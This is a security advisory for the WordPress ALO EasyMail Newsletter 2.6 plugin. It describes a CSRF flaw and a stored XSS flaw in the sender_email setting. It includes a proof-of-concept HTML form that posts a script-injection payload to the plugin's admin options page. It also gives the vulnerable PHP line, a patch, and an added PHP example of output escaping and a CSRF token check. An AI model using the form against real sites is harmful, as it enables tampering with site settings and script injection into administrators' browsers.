
WordPress ALO EasyMail Newsletter 2.6 CSRF / Cross Site Scripting

Posted on 17 September 2015

# Exploit Title: WordPress ALO EasyMail Newsletter CSRF/XSS
# Exploit Author: Ashiyane Digital Security Team
# Vendor Homepage: https://wordpress.org/plugins/alo-easymail/
# Software Link: https://downloads.wordpress.org/plugin/alo-easymail.2.6.00.zip
# Version: 2.6
# Date: 2015-09-15
# Tested on: Windows 7 / Firefox

####################################################

# Exploit:

<form name="XSS" method="POST" action="http://[URL]/[Path]/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php">
<input type="hidden" name="lastposts" value="10" />
<input type="hidden" name="sender_email" value='"><script>alert(/This is Xss/)</script>' />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="task" value="tab_newsletter" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit Form" />
</form>

####################################################################

# Vulnerable file: /wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php

# Vulnerable code, line 484:

<input type="text" name="sender_email" value="<?php echo get_option('alo_em_sender_email') ?>" id="sender_email" size="30" maxlength="100" />

=================================

# Patch for the XSS: replace line 484 with:

<input type="text" name="sender_email" value="<?php echo htmlspecialchars(get_option('alo_em_sender_email')) ?>" id="sender_email" size="30" maxlength="100" />

##########################################################

Discovered by: Amir.ght (Goldhack)
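The patch above encodes the stored value on output; the CSRF half of the finding (the settings form accepts a POST that carries no request token) is left open by it. The PHP below is an added example, not the advisory's or the plugin's code: it renders the sender_email field the vulnerable way and the hardened way against the advisory's own payload, and adds a token check on the save path, using plain PHP stand-ins (htmlspecialchars, hash_equals) for what a WordPress plugin would do with esc_attr(), wp_nonce_field() and check_admin_referer(); the session token and the accept_sender_email helper are assumptions for the demonstration.

```php
<?php
// Added example, not code from the advisory or the ALO EasyMail plugin.
// Constructed input: the sender_email value from the advisory's PoC form.
$payload = '"><script>alert(/This is Xss/)</script>';

// Rendering as on line 484: the stored option goes into a double-quoted
// attribute with no encoding, so a stored '"' closes the attribute early.
function render_sender_email_vulnerable(string $value): string
{
    return '<input type="text" name="sender_email" value="' . $value
         . '" id="sender_email" size="30" maxlength="100" />';
}

// Hardened rendering. ENT_QUOTES also covers single-quoted attributes and
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output;
// inside WordPress the idiomatic call is esc_attr($value).
function render_sender_email_safe(string $value): string
{
    $escaped = htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="sender_email" value="' . $escaped
         . '" id="sender_email" size="30" maxlength="100" />';
}

// Save path (assumed helper). A cross-site POST cannot carry the victim's
// per-session token, so rejecting it here keeps the payload from ever being
// stored. WordPress plugins get the same check from wp_nonce_field() in the
// form and check_admin_referer() before update_option().
function accept_sender_email(array $post, string $session_token): ?string
{
    $sent = (string) ($post['csrf_token'] ?? '');
    if ($sent === '' || !hash_equals($session_token, $sent)) {
        return null;  // rejected: missing or wrong token
    }
    // Validate the field as an address as well; an XSS payload is not an e-mail.
    $email = filter_var($post['sender_email'] ?? '', FILTER_VALIDATE_EMAIL);
    return $email === false ? null : $email;
}

$token = bin2hex(random_bytes(16));  // would live in the admin's session

echo render_sender_email_vulnerable($payload), PHP_EOL;  // attribute is broken out of
echo render_sender_email_safe($payload), PHP_EOL;        // payload stays inside value="..."
var_dump(accept_sender_email(['sender_email' => $payload], $token));
var_dump(accept_sender_email(
    ['sender_email' => 'news@example.com', 'csrf_token' => $token], $token));
```

Run it with the PHP CLI: the first echo shows the attribute closed and a script element emitted, the second shows the same bytes entity-encoded, and the first save attempt is refused before any validation runs.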
